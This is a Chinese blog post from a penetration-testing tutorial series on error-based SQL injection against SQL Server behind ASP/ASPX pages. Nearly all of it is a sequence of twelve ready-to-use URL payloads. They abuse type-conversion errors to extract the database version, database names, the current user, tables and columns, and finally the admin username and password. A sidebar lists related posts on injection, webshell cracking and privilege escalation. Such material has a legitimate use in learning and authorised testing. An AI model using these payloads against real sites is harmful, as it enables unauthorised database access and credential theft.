72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]

已于 2022-01-18 23:14:50 修改
阅读量3.1k 收藏 6
点赞数
分类专栏: # 1.网络安全渗透测试-[持续更新] 文章标签: SQLSERVER报错注入 sqlserver报错注入 sqlserver类型转换失败 sqlserver类型转换报错
于 2022-01-18 22:05:22 首次发布
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/122568900
版权

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

一、SQLSERVER+ASP 报错注入

1、sql server的报错页面

(1)背景:在语句执行时发生错误会报出错误,并且会在网页上显示出来。
(2)环境:sql server2008+aspx
(4)原理:利用mssql在类型转换失败时的报错,显示其相应的信息!!!
(3)限制:一次只能爆出一个字段。

2、SQLSERVER+ASP 报错注入示例

(1)爆出数据库版本:?id=1 and @@version>0
在这里插入图片描述

(2)爆出数据库:?id=1 and db_name()>0
在这里插入图片描述

(3)爆当前用户:?id=1 and User_Name()>0
在这里插入图片描述

(4)爆出其他数据库:?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
在这里插入图片描述

(5)爆出其他数据库(排除master数据库):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
在这里插入图片描述

(6)爆出其他数据库(排除master和iNetinkCMS):?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS'))>0
在这里插入图片描述

(7)爆当前数据库的表:?id=1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0
在这里插入图片描述

(8)爆出其他表(排除cmd):?id=1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0
在这里插入图片描述

(9)爆出列:?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin')>0
在这里插入图片描述

(10)爆出其他列(排除id):?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0
在这里插入图片描述

(11)爆出数据(username):?id=1 and (select top 1 username from admin)>0
在这里插入图片描述

(12)爆出数据(password):?id=1 and (select top 1 password from admin)>0
在这里插入图片描述

qwsn
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
Asp.net core 依赖注入 (带案例以及注释理解)
qq_45308912的博客
03-28 1001
依赖注入(Dependency Injection,简称DI)是一种设计模式,用于减少组件之间的耦合度。它的核心思想是,将组件之间的依赖关系从组件内部抽离出来,通过外部容器来管理这些依赖关系,从而实现组件之间的松耦合。举个例子,假设我们有一个类A,它依赖于另一个类B。在不使用依赖注入的情况下,我们需要在类A中创建一个实例化对象B,并在类A中直接调用B的方法。但是,如果我们使用依赖注入,我们可以将类B的实例化对象交给外部容器管理,并将它注入到类A中,从而实现解耦。
小白必读记——内网渗透之SQL注入基本原理和攻击(超级详细的哦)(一)
weixin_45900492的博客
12-03 1681
前言 在对信息安全的学习中,我们要时刻保持好奇心,多问为什么,要多去探究根本原理, 而不是只会使用工具和死记硬背,遇到不会又搜不到答案的问题,我们要大胆猜想, 小心求证,只有这样我们才能不断的进步,在信息安全的领域越走越远 重要部分请大家多读几遍 o! Web入侵先遣—SQL注入攻击技术初探 了解TA的前世今生 SQL注入式攻击技术,一般针对基于Web平台的应用程序.造成SQL注入攻击漏洞的原因,...
sql注入实例分析
weixin_30624825的博客
07-23 3404
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
sql注入-asp+access案例
qq_53706360的博客
12-04 55
id=1142 order by 22返回结果正常。id=1142 order by 23返回结果失败。爆破出密码: a48e190fafc257d3。爆出了admin字段的第一个值:admin。实战中表和列要靠字典去猜。
asp注入方法总结
love阳光 的专栏
03-19 4730
 asp注入方法总结 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 and [查询条件] and
71.网络安全渗透测试—[SQL注入10]—[SQLSERVER+ASP-联合查询注入]
qwsn
01-18 2220
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 联合查询注入 1、SQLSERVER 相关概念: 2、SQLSERVER+ASP 联合查询注入示例: (1)判断是否存在注入:`and/or逻辑判断` (2)判断列数:`order by` (3)联合查询注入—判断回显位:联合查询要求,联合查询的列与被联合查询的`列的个数和类型一致`,类型一致问题可以使用null值绕过。 (4)联合查询注入—查询系
ASP中的SQL注入
flynetcn的专栏
02-02 1732
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入是从正常的WWW端口访问,
web渗透测试----26、SQL注入漏洞--(1)原理
七天
08-26 5364
SQL注入漏洞
网络实验三
impOAQ的博客
12-03 297
XSS 1、什么是XSS XSS又叫CSS (Cross Site Script) 也称为跨站,它是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。 2 、什么是XSS攻击 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,由于HTML语言允许使用脚本进行简单交互,入侵者便通过技
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
第8章 8.WEB安全性测试--SQL注入四.mp4
05-08
第8章 8.WEB安全性测试--SQL注入四.mp4
第7章 7.WEB安全性测试--SQL注入三.mp4
05-08
第7章 7.WEB安全性测试--SQL注入三.mp4
第6章 6.WEB安全性测试--SQL注入二.mp4
05-08
第6章 6.WEB安全性测试--SQL注入二.mp4
48.网络安全渗透测试—[穷举11]—[webshell密码破解(asp/aspx/php)]
热门推荐
qwsn
08-07 63万+
我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、burpsuite2.0 webshell密码破解办法 1、目标1: `http://www.yijuhua.com/b.asp` 2、目标2:`http://www.yijuhua.com/b.php` 3、目标3:`http://www.yijuhua.com/b.aspx`
103.网络安全渗透测试—[权限提升1]—[Linux内核漏洞提权]
qwsn
02-15 7137
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
82.网络安全渗透测试—[SQL注入21]—Oracle+JSP-pipe.receive_message延时注入
qwsn
01-21 6908
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 延时注入 1、简介 2、注入技巧 二、pipe.receive_message 延时注入示例 1、判断是否存在注入 2、猜解长度并逐个猜解字符 3、以上可以替换的SQL语句
35.网络安全渗透测试—[信息收集4]—[端口扫描/常见端口服务]
qwsn
08-05 6763
为什么要端口扫描:一般在知道服务器开放了哪些端口后,就知道服务器开启了哪些服务。
98.网络安全渗透测试—[常规漏洞挖掘与利用14]—[SESSION身份验证绕过漏洞与测试]
qwsn
02-05 5903
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、session身份验证绕过漏洞与测试 1、session机制 2、session的生命周期 3、出现漏洞的情景 4、session身份验证绕过示例: (1)源码:`session.php` (2)绕过:`抓包改包` (3)总结:
class+java.sql.date+has+no+zero-arg
最新发布
01-25
第一个问题是关于前端实现类似HUE的SQL编辑器的需求,其中包括SQL语句的格式化、自动匹配大小写和代码高亮等功能。第二个问题是关于报错问题和修改后的源码问题的总结。 对于你提到的第一个问题,前端实现类似HUE的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值